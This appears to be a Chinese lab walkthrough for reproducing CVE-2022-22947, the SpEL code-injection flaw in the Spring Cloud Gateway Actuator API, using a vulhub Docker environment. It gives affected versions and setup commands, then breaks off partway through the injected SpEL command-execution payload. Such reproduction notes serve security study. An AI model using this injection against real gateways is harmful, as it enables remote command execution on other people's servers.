CVE-2022-22947
Spring Cloud Gateway Actuator API SpEL代码注入
影响版本
- Spring Cloud Gateway 3.0.0以下,3.1.0,3.0.0~3.0.6
漏洞描述
Gateway是在Spring生态系统之上构建的API网关服务,基于Spring 5、Spring Boot 2和Project Reactor等技术。Gateway旨在提供-种简单而有效的方式来对API进行路由, 以及提供一些强大的过滤器功能, 例如: 熔断、限流、重试等。Spring Cloud Gateway的目标提供统-的路由方式且基于 Filter链的方式提供了网关基本的功能,例如:安全,监控/指标,和限流。
该漏洞是发生在Spring Cloud Gateway应用程序的Actuator接口,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。
环境搭建
-
进入到漏洞目录
cd /vulhub/spring/CVE-2022-22947
-
启动靶场
docker-compose up -d
-
访问网站
漏洞复现
参考文章:https://vulhub.org/#/environments/spring/CVE-2022-22947/
-
Yakit发送POST请求添加包含邪恶 SpEL路由,返回数据包显示路由创建成功
包含执行命令的代码#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Run